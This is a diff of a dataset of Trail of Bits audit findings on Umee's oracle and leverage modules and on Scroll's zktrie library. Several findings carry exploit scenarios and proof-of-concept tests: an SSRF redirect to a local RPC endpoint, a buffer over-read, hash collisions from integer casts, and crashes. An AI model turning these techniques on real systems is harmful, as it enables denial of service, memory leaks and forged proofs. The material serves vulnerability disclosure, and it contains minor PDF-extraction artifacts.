on-chain. However, an asset price could easily be manipulated by only one compromised or malfunctioning third-party provider. Exploit Scenario Most validators are using the Binance API as one of their price providers. The API is compromised by an attacker and suddenly starts to report prices that are much higher than those reported by other providers. However, the price-feeder instances being used by the validators do not detect the discrepancies in the Binance API prices. As a result, the VWAP value computed by the price-feeder and committed on-chain is much higher than it should be. Moreover, because most validators have committed the wrong price, the average computed on-chain is also wrong. The attacker then draws funds from the system. Recommendations Short term, implement a price-feeder mechanism for detecting the submission of wildly incorrect prices by a third-party provider. Have the system temporarily disable the use of the malfunctioning provider(s) and issue an alert calling for an investigation. If it is not possible to automatically identify the malfunctioning provider(s), stop committing prices. (Note, though, that this may result in a loss of interest for validators.) Consider implementing a similar mechanism in the x/oracle module so that it can identify when the exchange rates committed by validators are too similar to one another or to old values. References Synthetix Response to Oracle Incident", + "title": "16. Safe-Rust ZkMemoryDb interface is not thread-safe ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Go function Database.Init, shown in gure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required. // Init flush db with batches of k/v without locking func (db *Database) Init(k, v []byte) { db.db[string(k)] = v } Figure 16.1: trie/zk_trie_database.go#4043 However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (gure 16.2) via the cgo function InitDbByNode (gure 16.3): pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> { let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) }; if ret_ptr.is_null() { Ok(()) } else { Err(ret_ptr.into()) } } Figure 16.2: src/lib.rs#171178 // flush db with encoded trie-node bytes //export InitDbByNode func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.DecodeSMTProof(bt) if err != nil { return C.CString(err.Error()) } else if n == nil { //skip magic string return nil } hash, err := n.NodeHash() if err != nil { return C.CString(err.Error()) } db.Init(hash[:], n.CanonicalValue()) return nil } Figure 16.3: lib.go#147170 Safe Rust is required to never invoke undened behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undened behavior through that wrapper. (Refer to the How Safe and Unsafe Interact section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rusts borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl. pub fn new_trie(&mut self, root: &Hash) -> Option { let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) }; if ret.is_null() { None } else { Some(ZkTrie { trie: ret }) } } Figure 16.4: src/lib.rs#181189 func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) root := C.GoBytes(unsafe.Pointer(root_c), 32) zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db) if err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(zktrie)) } Figure 16.5: lib.go#174185 func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) { return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels) } // NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one // will open that one, if not, will create a new one. func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) { mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true} mt.rootHash = root if *root != zkt.HashZero { _, err := mt.GetNode(mt.rootHash) if err != nil { return nil, err } } return &mt, nil } Figure 16.6: trie/zk_trie_impl.go#5672 Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get(), one can trigger a data race from safe Rust. Exploit Scenario A Rust-based library consumer uses threads to improve performance. Relying on Rusts type system, they assume that thread safety has been enforced and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes. Recommendations Short term, add synchronization to Database.Init, such as by calling db.lock.Lock(). Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the How Safe and Unsafe Interact section of the Rustonomicon.", "labels": [ "Trail of Bits", "Severity: High", @@ -3502,159 +6200,159 @@ ] }, { - "title": "9. Oracle rewards may not be distributed ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "If the x/oracle module lacks the coins to cover a reward payout, the rewards will not be distributed or registered for payment in the future. var periodRewards sdk.DecCoins for _, denom := range rewardDenoms { rewardPool := k.GetRewardPool(ctx, denom) // return if there's no rewards to give out if rewardPool.IsZero() { continue } periodRewards = periodRewards.Add(sdk.NewDecCoinFromDec( denom, sdk.NewDecFromInt(rewardPool.Amount).Mul(distributionRatio), )) } Figure 9.1: A loop in the code that calculates oracle rewards ( umee/x/oracle/keeper/reward.go#4356 ) Recommendations Short term, document the fact that oracle rewards will not be distributed when the x/oracle module does not have enough coins to cover the rewards.", + "title": "17. Some Node functions return the zero hash instead of errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in gure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in gure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values. 18. get_account can read past the bu\u0000er Severity: High Diculty: Medium Type: Data Exposure Finding ID: TOB-ZKTRIE-18 Target: lib.rs", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "10. Risk of server-side request forgery attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The price-feeder sends HTTP requests to congured providers APIs. If any of the HTTP responses is a redirect response (e.g., one with HTTP response code 301), the module will automatically issue a new request to the address provided in the responses header. The new address may point to a local address, potentially one that provides access to restricted services. Exploit Scenario An attacker gains control over the Osmosis API. He changes the endpoint used by the price-feeder such that it responds with a redirect like that shown in gure 10.1, with the goal of removing a transaction from a Tendermint validators mempool. The price-feeder automatically issues a new request to the Tendermint REST API. Because the API does not require authentication and is running on the same machine as the price-feeder , the request is successful, and the target transaction is removed from the validator's mempool. HTTP/1.1 301 Moved Permanently Location: http://localhost:26657/remove_tx?txKey=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Figure 10.1: The redirect response Recommendations Short term, use a function such as CheckRedirect to disable redirects, or at least redirects to local services, in all HTTP clients.", + "title": "4. BuildZkTrieProof does not populate NodeAux.Value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "A nonexistence proof for some key k in a Merkle tree is a Merkle path from the root of the tree to a subtree, which would contain k if it were present but which instead is either an empty subtree or a subtree with a single leaf k2 where k != k2. In the zktrie codebase, that second case is handled by the NodeAux eld in the Proof struct, as illustrated in gure 4.1. // Verify the proof and calculate the root, nodeHash can be nil when try to verify // a nonexistent proof func (proof *Proof) Verify(nodeHash, nodeKey *zkt.Hash) (*zkt.Hash, error) { if proof.Existence { if nodeHash == nil { return nil, ErrKeyNotFound } return proof.rootFromProof(nodeHash, nodeKey) } else { if proof.NodeAux == nil { return proof.rootFromProof(&zkt.HashZero, nodeKey) } else { if bytes.Equal(nodeKey[:], proof.NodeAux.Key[:]) { return nil, fmt.Errorf(\"non-existence proof being checked against hIndex equal to nodeAux\") } midHash, err := LeafHash(proof.NodeAux.Key, proof.NodeAux.Value) if err != nil { return nil, err } return proof.rootFromProof(midHash, nodeKey) } } } Figure 4.1: The Proof.Verify method (zktrie/trie/zk_trie_impl.go#609632) When a non-inclusion proof is generated, the BuildZkTrieProof function looks up the other leaf node and uses its NodeKey and valueHash elds to populate the Key and Value elds of NodeAux, as shown in gure 4.2. However, the valueHash eld of this node may be nil, causing NodeAux.Value to be nil and causing proof verication to crash with a nil pointer dereference error, which can be triggered by the test case shown in gure 4.3. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.2: Populating NodeAux (zktrie/trie/zk_trie_impl.go#560574) func TestMerkleTree_GetNonIncProof(t *testing.T) { zkTrie := newTestingMerkle(t, 10) t.Run(\"Testing for non-inclusion proofs\", func(t *testing.T) { k := zkt.Byte32{1} k_value := (&[1]zkt.Byte32{{1}})[:] k_other := zkt.Byte32{2} k_hash_int, _ := k.Hash() k_other_hash_int, _ := k_other.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) k_other_hash := zkt.NewHashFromBigInt(k_other_hash_int) assert.Nil(t, zkTrie.TryUpdate(k_hash, 0, k_value)) getNode := func(hash *zkt.Hash) (*Node, error) { return zkTrie.GetNode(hash) } proof, _, err := BuildZkTrieProof(zkTrie.rootHash, k_other_hash_int, 10, getNode) assert.Nil(t, err) assert.False(t, proof.Existence) proof_root, _ := proof.Verify(nil, k_other_hash) assert.Equal(t, proof_root, zkTrie.rootHash) }) } Figure 4.3: A test case that will crash with a nil dereference of NodeAux.Value Adding a call to n.NodeHash() inside BuildZkTrieProof, as shown in gure 4.4, xes this problem. n, err := getNode(nextHash) if err != nil { return nil, nil, err } switch n.Type { case NodeTypeEmpty: return p, n, nil case NodeTypeLeaf: if bytes.Equal(kHash[:], n.NodeKey[:]) { p.Existence = true return p, n, nil } // We found a leaf whose entry didn't match hIndex p.NodeAux = &NodeAux{Key: n.NodeKey, Value: n.valueHash} return p, n, nil Figure 4.4: Adding the highlighted n.NodeHash() call xes this problem. (zktrie/trie/zk_trie_impl.go#560574) Exploit Scenario An adversary or ordinary user requests that the software generate and verify a non-inclusion proof, and the software crashes, leading to the loss of service. Recommendations Short term, x BuildZkTrieProof by adding a call to n.NodeHash(), as described above. Long term, ensure that all major code paths in important functions, such as proof generation and verication, are tested. The Go coverage analysis report generated by the command go test -cover -coverprofile c.out && go tool cover -html=c.out shows that this branch in Proof.Verify is not currently tested: Figure 4.5: The Go coverage analysis report", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "11. Incorrect comparison in SetCollateralSetting method ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "Umee users can send a SetCollateral message to disable the use of a certain asset as collateral. The messages are handled by the SetCollateralSetting method (gure 11.1), which should ensure that the borrow limit will not drop below the amount borrowed. However, the function uses an incorrect comparison, checking that the borrow limit will be greater than, not less than, that amount. // Return error if borrow limit would drop below borrowed value if newBorrowLimit.GT(borrowedValue) { return sdkerrors.Wrap(types.ErrBorrowLimitLow, newBorrowLimit.String()) } Figure 11.1: The incorrect comparison in the SetCollateralSetting method ( umee/x/leverage/keeper/keeper.go#343346 ) Exploit Scenario An attacker provides collateral to the Umee system and borrows some coins. Then the attacker disables the use of the collateral asset; because of the incorrect comparison in the SetCollateralSetting method, the disable operation succeeds, and the collateral is sent back to the attacker. Recommendations Short term, correct the comparison in the SetCollateralSetting method. Long term, implement tests to check whether basic functionality works as expected.", + "title": "5. Leaf nodes with di\u0000erent values may have the same hash ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The hash value of a leaf node is derived from the hash of its key and its value. A leaf nodes value comprises up to 256 32-byte elds, and that values hash is computed by passing those elds to the HashElems function. HashElems hashes these elds in a Merkle treestyle binary tree pattern, as shown in gure 5.1. func HashElems(fst, snd *big.Int, elems ...*big.Int) (*Hash, error) { l := len(elems) baseH, err := hashScheme([]*big.Int{fst, snd}) if err != nil { return nil, err } if l == 0 { return NewHashFromBigInt(baseH), nil } else if l == 1 { return HashElems(baseH, elems[0]) } tmp := make([]*big.Int, (l+1)/2) for i := range tmp { if (i+1)*2 > l { tmp[i] = elems[i*2] } else { h, err := hashScheme(elems[i*2 : (i+1)*2]) if err != nil { return nil, err } tmp[i] = h } } return HashElems(baseH, tmp[0], tmp[1:]...) } Figure 5.1: Binary-tree hashing in HashElems (zktrie/types/util.go#936) However, HashElems does not include the number of elements being hashed, so leaf nodes with dierent values may have the same hash, as illustrated in the proof-of-concept test case shown in gure 5.2. func TestMerkleTree_MultiValue(t *testing.T) { t.Run(\"Testing for value collisions\", func(t *testing.T) { k := zkt.Byte32{1} k_hash_int, _ := k.Hash() k_hash := zkt.NewHashFromBigInt(k_hash_int) value1 := (&[3]zkt.Byte32{{1}, {2}, {3}})[:] value1_hash, _ := NewLeafNode(k_hash, 0, value1).NodeHash() first2_hash, _ := zkt.PreHandlingElems(0, value1[:2]) value2 := (&[2]zkt.Byte32{*zkt.NewByte32FromBytes(first2_hash.Bytes()), value2_hash, _ := NewLeafNode(k_hash, 0, value2).NodeHash() assert.NotEqual(t, value1, value2) assert.NotEqual(t, value1_hash, value2_hash) {3}})[:] }) } Figure 5.2: A proof-of-concept test case for value collisions Exploit Scenario An adversary inserts a maliciously crafted value into the tree and then creates a proof for a dierent, colliding value. This violates the security requirements of a Merkle tree and may lead to incorrect behavior such as state divergence. Recommendations Short term, modify PrehandlingElems to prex the ValuePreimage array with its length before being passed to HashElems. Long term, document and review all uses of hash functions to ensure that they commit to their inputs.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Low" + "Difficulty: Medium" ] }, { - "title": "12. Voters ability to overwrite their own pre-votes is not documented ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The x/oracle module allows voters to submit more than one pre-vote message during the same pre-voting period, overwriting their previous pre-vote messages (gure 12.1). This feature is not documented; while it does not constitute a direct security risk, it may be unintended behavior. Third parties may incorrectly assume that validators cannot change their pre-vote messages. Monitoring systems may detect only the rst pre-vote event for a validators pre-vote messages, while voters may trust the exchange rates and salts revealed by other voters to be nal. On the other hand, this feature may be an intentional one meant to allow voters to update the exchange rates they submit as they obtain more accurate pricing information. func (ms msgServer) AggregateExchangeRatePrevote( goCtx context.Context, msg *types.MsgAggregateExchangeRatePrevote, ) (*types.MsgAggregateExchangeRatePrevoteResponse, error ) { // (...) aggregatePrevote := types.NewAggregateExchangeRatePrevote(voteHash, valAddr, uint64 (ctx.BlockHeight())) // This call overwrites previous pre-vote if there was one ms.SetAggregateExchangeRatePrevote(ctx, valAddr, aggregatePrevote) ctx.EventManager().EmitEvents(sdk.Events{ // (...) - emit EventTypeAggregatePrevote and EventTypeMessage }) return &types.MsgAggregateExchangeRatePrevoteResponse{}, nil } Figure 12.1: umee/x/oracle/keeper/msg_server.go#L23-L66 Recommendations Short term, document the fact that a pre-vote message can be submitted and overwritten in the same voting period. Alternatively, disallow this behavior by having the AggregateExchangeRatePrevote function return an error if a validator attempts to submit an additional exchange rate pre-vote message. Long term, add tests to check for this behavior.", + "title": "17. Some Node functions return the zero hash instead of errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in gure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in gure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "13. Lack of user-controlled limits for input amount in LiquidateBorrow ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The x/leverage modules LiquidateBorrow function computes the amount of funds that will be transferred from the module to the functions caller in a liquidation. The computation uses asset prices retrieved from an oracle. There is no guarantee that the amount returned by the module will correspond to the current market price, as a transaction that updates the price feed could be mined before the call to LiquidateBorrow . Adding a lower limit to the amount sent by the module would enable the caller to explicitly state his or her assumptions about the liquidation and to ensure that the collateral payout is as protable as expected. It would also provide additional protection against the misreporting of oracle prices. Since such a scenario is unlikely, we set the diculty level of this nding to high. Using caller-controlled limits for the amount of a transfer is a best practice commonly employed by large DeFi protocols such as Uniswap. Exploit Scenario Alice calls the LiquidateBorrow function. Due to an oracle malfunction, the amount of collateral transferred from the module is much lower than the amount she would receive on another market. Recommendations Short term, introduce a minRewardAmount parameter and add a check verifying that the reward value is greater than or equal to the minRewardAmount value. Long term, always allow the caller to control the amount of a transfer. This is especially important for transfer amounts that depend on factors that can change between transactions. Enable the caller to add a lower limit for a transfer from a module and an upper limit for a transfer of the callers funds to a module.", + "title": "18. get_account can read past the bu\u0000er ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information. In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes depending on whether they include one or two code hashes. On the other hand, storage values always have a size of 32 bytes. The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buer. This is shown in gure 18.4. // get account data from account trie pub fn get_account(&self, key: &[u8]) -> Option { self.get::(key).map(|arr| unsafe { std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr) }) } Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230235) // all errors are reduced to \"not found\" fn get(&self, key: &[u8]) -> Option<[u8; T]> { let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) }; if ret.is_null() { None } else { Some(must_get_const_bytes::(ret)) } } Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214223) fn must_get_const_bytes(p: *const u8) -> [u8; T] { let bytes = unsafe { std::slice::from_raw_parts(p, T) }; let bytes = bytes .try_into() .expect(\"the buf has been set to specified bytes\"); unsafe { FreeBuffer(p.cast()) } bytes } Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p. (zktrie/src/lib.rs#100107) #[test] fn get_account_overflow() { let storage_key = hex::decode(\"0000000000000000000000000000000000000000000000000000000000000000\") .unwrap(); let storage_data = [10u8; 32]; init_hash_scheme(hash_scheme); let mut db = ZkMemoryDb::new(); let root_hash = Hash::from([0u8; 32]); let mut trie = db.new_trie(&root_hash).unwrap(); trie.update_store(&storage_key, &storage_data).unwrap(); println!(\"{:?}\", trie.get_account(&storage_key).unwrap()); } // Sample output (picked from a sample of ten runs): // [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] Figure 18.4: This is a proof-of-concept demonstrating the buer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes with the last 96 bits being over-read. Exploit Scenario Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out-of-bounds. Recommendations Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings. Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "14. Lack of simulation and fuzzing of leverage module invariants ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The Umee system lacks comprehensive Cosmos SDK simulations and invariants for its x/oracle and x/leverage modules. More thorough use of the simulation feature would facilitate fuzz testing of the entire blockchain and help ensure that the invariants hold. Additionally, the current simulation module may need to be modied for the following reasons: It exits on the rst transaction error . To avoid an early exit, it could skip transactions that are expected to fail when they are generated; however, that could also cause it to skip logic that contains issues. The numKeys argument , which determines how many accounts it will use, can range from 2 to 2,500. Using too many accounts may hinder the detection of bugs that require multiple transactions to be executed by a few accounts. By default, it is congured to use a \"stake\" currency , which may not be used in the nal Umee system. Running it with a small number of accounts and a large block size for many blocks could quickly cause all validators to be unbonded. To avoid this issue, the simulation would need the ability to run for a longer time. attempted to use the simulation module by modifying the recent changes to the Umee codebase, which introduce simulations for the x/oracle and x/leverage modules (commit f22b2c7f8e ). We enabled the x/leverage module simulation and modied the Cosmos SDK codebase locally so that the framework would use fewer accounts and log errors via Fatalf logs instead of exiting. The framework helped us nd the issue described in TOB-UMEE-15 , but the setup and tests we implemented were not exhaustive. We sent the codebase changes we made to the Umee team via an internal chat. Recommendations Short term, identify, document, and test all invariants that are important for the systems security, and identify and document the arbitrage opportunities created by the system. Enable simulation of the x/oracle and x/leverage modules and ensure that the following assertions and invariants are checked during simulation runs: 1. In the UpdateExchangeRates function , the token supply value corresponds to the uToken supply value. Implement the following check: if uTokenSupply != 0 { assert(tokenSupply != 0) } 2. In the LiquidateBorrow function (after the line if !repayment.Amount.IsPositive() ) , the following comparisons evaluate to true: ExchangeUToken(reward) == EquivalentTokenValue(repayment, baseRewardDenom) TokenValue(ExchangeUToken(ctx, reward)) == TokenValue(repayment) borrowed.AmountOf(repayment.Denom) >= repayment.Amount collateral.AmountOf(rewardDenom) >= reward.Amount module's collateral amount >= reward.Amount repayment <= desiredRepayment 3. The x/leverage module is never signicantly undercollateralized at the end of a transaction. Implement a check, total collateral value * X >= total borrows value , in which X is close to 1. (It may make sense for the value of X to be greater than or equal to 1 to account for module reserves.) It may be acceptable for the module to be slightly undercollateralized, as it may mean that some liquidations have yet to be executed. 4. The amount of reserves remains above a certain minimum value, or new loans cannot be issued if the amount of reserves drops below a certain value. 5. The interest on a loan is less than or equal to the borrowing fee. (This invariant is related to the issue described in TOB-UMEE-23 .) 6. 7. 8. It is impossible to borrow funds without paying a fee. Currently, when four messages (lend, borrow, repay, and withdraw messages) are sent in one transaction, the EndBlocker method will not collect borrowing fees. Token/uToken exchange rates are always greater than or equal to 1 and are less than an expected maximum. To avoid rapid signicant price increases and decreases, ensure that the rates do not change more quickly than expected. The exchangeRate value cannot be changed by public (user-callable) methods like LendAsset and WithdrawAsset . Pay special attention to rounding errors and make sure that the module is the beneciary of all rounding operations. 9. It is impossible to liquidate more than the closeFactor in a single liquidation transaction for a defaulted loan; be mindful of the fact that a single transaction can include more than one message. Long term, e xtend the simulation module to cover all operations that may occur in a real Umee deployment, along with all potential error states, and run it many times before each release. Ensure the following: All modules and operations are included in the simulation module. The simulation uses a small number of accounts (e.g., between 5 and 20) to increase the likelihood of an interesting state change. The simulation uses the currencies/tokens that will be used in the production network. Oracle price changes are properly simulated. (In addition to a mode in which prices are changed randomly, implement a mode in which prices are changed only slightly, a mode in which prices are highly volatile, and a mode in which prices decrease or increase continuously for a long time period.) The simulation continues running when a transaction triggers an error. All transaction code paths are executed. (Enable code coverage to see how often individual lines are executed.)", + "title": "19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-scroll-zktrie-securityreview.pdf", + "body": "A set of unchecked integer casting operations can lead to hash collisions and runtime errors reached from the public Rust interface. The Rust library regularly needs to convert the input functions byte array length from the usize type to the c_int type. Depending on the architecture, these types might dier in size and signedness. This dierence allows an attacker to provide an array with a maliciously chosen length that will be cast to a dierent number. The attacker can choose to manipulate the array and cast the value to a smaller value than the actual array length, allowing the attacker to create two leaf nodes from dierent byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function. The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse: impl ZkTrieNode { pub fn parse(data: &[u8]) -> Self { Self { trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) }, } } Figure 19.1: zktrie/src/lib.rs#133138 To achieve a collision for nodes constructed from dierent byte arrays, rst observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that have the same prex and are then padded with dierent bytes with that length will cause the Go library to interpret only the common prex of these nodes. The following test showcases this exploit. #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); // common prefix let nd = &hex::decode(\"012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b648640101 00000000000000000000000000000000000000000000000000000000018282256f8b00\").unwrap(); // create node1 with prefix padded by zeroes let mut vec_nd = nd.to_vec(); let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut zero_padd_data); let node1 = ZkTrieNode::parse(&vec_nd); // create node2 with prefix padded by ones let mut vec_nd = nd.to_vec(); let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut one_padd_data); let node2 = ZkTrieNode::parse(&vec_nd); // create node3 with just the prefix let node3 = ZkTrieNode::parse(&hex::decode(\"012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a8 39ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f 8b00\").unwrap()); // all hashes are equal assert_eq!(node1.node_hash(), node2.node_hash()); assert_eq!(node1.node_hash(), node3.node_hash()); } Figure 19.2: A test showing three dierent leaf nodes with colliding hashes This nding also allows an attacker to cause a runtime error by choosing the data array with the appropriate length that will cause the cast to result in a negative number. Figure 19.2 shows a test that triggers the runtime error for the parse function: #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); let data = vec![0u8; c_int::MAX as usize + 1]; println!(\"{:?}\", data.len() as c_int); let _nd = ZkTrieNode::parse(&data); } // running 1 test // -2147483648 // panic: runtime error: gobytes: length out of range // goroutine 17 [running, locked to thread]: _cgo_gotypes.go:102 // main._Cfunc_GoBytes(...) // // main.NewTrieNode.func1(0x14000062de8?, 0x80000000) // /zktrie/lib.go:78 +0x50 // main.NewTrieNode(0x14000062e01?, 0x2680?) /zktrie/lib.go:78 +0x1c // Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array Exploit Scenario An attacker provides two dierent byte arrays that will have the same node_hash, breaking the assumption that such nodes are hard to obtain. Recommendations Short term, have the code perform the cast in a checked manner by using the c_int::try_from method to allow validation if the conversion succeeds. Determine whether the Rust functions should allow arbitrary length inputs; document the length requirements and assumptions. Long term, regularly run Clippy in pedantic mode to nd and x all potentially dangerous casts. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "15. Attempts to overdraw collateral cause WithdrawAsset to panic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Umee.pdf", - "body": "The WithdrawAsset function panics when an account attempts to withdraw more collateral than the account holds. While panics triggered during transaction runs are recovered by the Cosmos SDK , they should be used only to handle unexpected events that should not occur in normal blockchain operations. The function should instead check the collateralToWithdraw value and return an error if it is too large. The panic occurs in the Dec.Sub method when the calculation it performs results in an overow (gure 15.1). func (k Keeper) WithdrawAsset( /* (...) */ ) error { // (...) if amountFromCollateral.IsPositive() { if k.GetCollateralSetting(ctx, lenderAddr, uToken.Denom) { // (...) // Calculate what borrow limit will be AFTER this withdrawal collateral := k.GetBorrowerCollateral(ctx, lenderAddr) collateralToWithdraw := sdk.NewCoins(sdk.NewCoin(uToken.Denom, amountFromCollateral)) newBorrowLimit, err := k.CalculateBorrowLimit(ctx, collateral.Sub(collateralToWithdraw) ) Figure 15.1: umee/x/leverage/keeper/keeper.go#L124-L159 To 